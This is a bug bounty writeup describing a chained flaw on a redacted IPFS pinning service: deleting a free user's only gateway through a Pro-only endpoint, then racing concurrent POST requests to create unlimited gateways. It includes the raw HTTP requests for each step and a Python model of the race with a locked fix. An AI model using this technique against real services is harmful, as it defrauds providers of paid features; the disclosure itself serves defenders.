Restricted? Not Anymore! Exploiting a Simple race condition Flaw

Mo2men Elmady
Feb 27, 2025


In the name of Allah, the Most Gracious, the Most Merciful. O Allah, send blessings, peace and grace upon our Prophet Muhammad.

## Introduction

Hey, Geeks! Today, I’m diving into an exciting chain bug I found with my buddy @karemelsqary during a private bug bounty program. This vulnerability let free plan users on a popular IPFS service create unlimited gateways — something they definitely shouldn’t have been able to do — by exploiting a race condition after deleting their only gateway.

## Background

Redacted is a well-known platform that provides IPFS pinning and gateway services, enabling users to store and access files in a decentralized manner. One of its standout features is the ability to create custom gateways — dedicated URLs for accessing IPFS content.

The system’s supposed to lock it down: free plan users can’t delete their sole gateway, ensuring they always have one to work with. But I spotted a crack in that armor — a flaw that not only let me trash that lone gateway but also opened the door to spinning up as many new ones as I wanted via a race condition. Let’s break it down.

## The Bug: A Two-Part Vulnerability

This chain bug consists of two critical issues:

1. Gateway deletion flaw: free users could delete their only gateway even though the server returned an error, leaving the account in an invalid state with zero gateways.

2. Race condition: concurrent creation requests bypassed the gateway limit, enabling unlimited gateway creation.

Together, these issues allowed free plan users to abuse the system, creating as many gateways as they wanted.

### Step 1: Retrieve the Gateway ID

First, I needed to retrieve the ID of the existing gateway. This was done by sending a GET request to the `/v3/ipfs/gateways` endpoint.

```http
GET /v3/ipfs/gateways?page=1&pageSize=10 HTTP/1.1
Host: api.example.cloud
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-example-Origin: frontend
Authorization: Bearer <token>
```

The response contained the list of gateways, including their IDs. For this example, let's assume the gateway ID is `xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx`.

### Step 2: Delete the Only Gateway

Even though free users didn’t have a delete function, I noticed it existed for Pro users.

By extracting the request format and replacing the token and ID, I sent:

```http
DELETE /v3/ipfs/gateways/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx HTTP/1.1
Host: api.example.cloud
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-example-Origin: frontend
Authorization: Bearer <token>
Source: login
Origin: https://app.example.cloud
Referer: https://app.example.cloud/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
```

Interestingly, even though the server returned an error (likely indicating that deleting the last gateway is not allowed), the gateway was still deleted. This left the account in an invalid state with zero gateways.

### Step 3: Exploit the Race Condition to Create Unlimited Gateways

With the account now having no gateways, I could exploit a race condition by sending multiple concurrent POST requests to the `/v3/ipfs/gateways` endpoint to create new gateways.

```http
POST /v3/ipfs/gateways HTTP/1.1
Host: api.example.cloud
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-example-Origin: frontend
Authorization: Bearer <token>
Source: login
Content-Length: 37
Origin: https://app.example.cloud
Referer: https://app.example.cloud/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Priority: u=0
Te: trailers

{"domain": "red-implicit-wallaby-406"}
```

By sending multiple requests simultaneously, I bypassed the free plan’s limit and created unlimited gateways before the system could enforce restrictions.
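To show why a burst of concurrent requests gets past the limit, here is an added Python model (my own illustration, not the platform's code) of a check-then-act quota check beside one that holds a lock across the check and the insert. The in-memory store, the limit of one gateway and the `window` hook that widens the race window are assumptions for the demonstration.

```python
import threading

FREE_PLAN_LIMIT = 1  # assumed free-plan cap of one gateway, modelled on the writeup

class VulnerableGatewayStore:
    """Check-then-act with no lock spanning both steps."""
    def __init__(self, window=lambda: None):
        self.gateways = []
        self.window = window  # test hook that widens the gap between check and act

    def create(self, domain: str) -> bool:
        if len(self.gateways) >= FREE_PLAN_LIMIT:  # 1. check the quota
            return False                           # over limit: reject
        self.window()                              # concurrent requests land in this gap
        self.gateways.append(domain)               # 2. act on a now-stale count
        return True

class HardenedGatewayStore:
    """Check and insert run under one lock. In a real service this is a
    transaction holding a row lock on the account, or an atomic conditional
    update of the per-account counter, so the count cannot change in between."""
    def __init__(self):
        self.gateways = []
        self._lock = threading.Lock()

    def create(self, domain: str) -> bool:
        with self._lock:
            if len(self.gateways) >= FREE_PLAN_LIMIT:
                return False
            self.gateways.append(domain)
            return True

def burst(store, n: int) -> int:
    """Send n concurrent creation requests; return how many were accepted."""
    results = []
    def worker(i: int) -> None:
        results.append(store.create(f"gateway-{i}"))
    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)

def demo(n: int = 10) -> tuple:
    """Same burst against both stores; returns (vulnerable, hardened) counts."""
    gate = threading.Barrier(n)  # every worker passes the check before any insert
    return burst(VulnerableGatewayStore(window=gate.wait), n), burst(HardenedGatewayStore(), n)
```

`demo(10)` returns `(10, 1)`: the unlocked store accepts all ten requests because each one read a count of zero, while the locked store accepts exactly one.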

## Impact of the Bug

- Bypassing Free Plan Restrictions: Free plan users could create an unlimited number of gateways, which is a feature typically reserved for paid plans. This undermines the platform’s business model and fair usage policies.

Thank you for reviewing this writeup <3
